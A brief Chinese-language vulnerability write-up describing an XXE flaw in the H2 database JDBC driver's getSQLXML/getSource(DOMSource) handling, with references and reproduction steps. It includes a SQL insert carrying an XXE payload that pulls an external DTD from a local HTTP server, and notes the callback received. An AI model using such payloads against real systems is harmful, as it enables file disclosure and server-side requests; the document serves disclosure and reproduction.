0x00漏洞介绍
org.h2.jdbc.JdbcResultSet类在分析数据库返回的数据时,提供了getSQLXML(java.lang.String)方法
将字符串数据解析为org.h2.jdbc.JdbcSQLXML类的对象。
当对象执行getSource(Class sourceClass)方法时
如果输入参数为DOMSource.class,会导致XML解析不受保护,导致XXE。
参考资料
https://github.com/h2database/h2database/issues/3195
https://mp.weixin.qq.com/s/erIFMiPNB2XSBJSqXyxuKg
0x01漏洞复现
作者在GitHub上传了漏洞环境便以其他人进行复现
https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe
首先先进行创建表跟插入数据:
create table tb_test ( idbigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键id', message text COMMENT 'SQLXML', PRIMARY KEY (`id`) ); insert into tb_test(message)values('<?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY% remote SYSTEM "http://127.0.0.1:80/xxe.dtd">%remote; ]>');
设置数据库账号密码等
开启http服务,这里使用的python3-m http.server 80
并放入dtd文件
运行漏洞环境poc
收到了jdbc的请求